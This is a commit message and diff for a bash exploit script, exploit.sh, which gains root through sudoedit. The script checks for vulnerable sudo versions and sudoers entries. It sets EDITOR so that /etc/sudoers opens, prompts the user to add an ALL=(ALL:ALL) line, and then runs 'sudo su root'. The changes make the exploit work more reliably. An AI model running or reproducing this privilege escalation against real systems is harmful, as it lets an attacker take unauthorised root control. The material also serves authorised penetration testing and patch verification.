Fixing bugs and improving checks

+ Improved tests on sudoers config file: **the original script have some pitfalls that wouldnt allow to run the script even if the config is vulnerable**, for example when sudoedit is configured with (ALL) or (ALL : ALL) instead of (root), which are still vulnerable configurations. In the last case, it will also break the original script because of the way the last grep was implemented, its also fixed on this version.
+ Added **test to check** if sudo **version** is vulnerable.
+ **Fixed bug** *"EDITOR: command not found" when trying to open the editor and typo in `etc/sudoers` filename.

exploit.sh

@@ -18,15 +18,24 @@
 # attacker to add a line to gain privileges on all the files and get a root 
 # shell.
 
-EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-)
+if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
+then
+    echo "> Currently installed sudo version is not vulnerable"
+    exit 1
+fi
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
 
 if [ -z "$EXPLOITABLE" ]; then
-    echo "> This user can't run sudoedit as root"
+    echo "> It doesn't seem that this user can run sudoedit as root"
+    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
 else
     echo "> BINGO! User exploitable"
     echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
     echo "$USER ALL=(ALL:ALL) ALL"
     read -n 1 -s -r -p "Press any key to continue..."
-    EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
+    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
     sudo su root
+    exit 0
 fi
+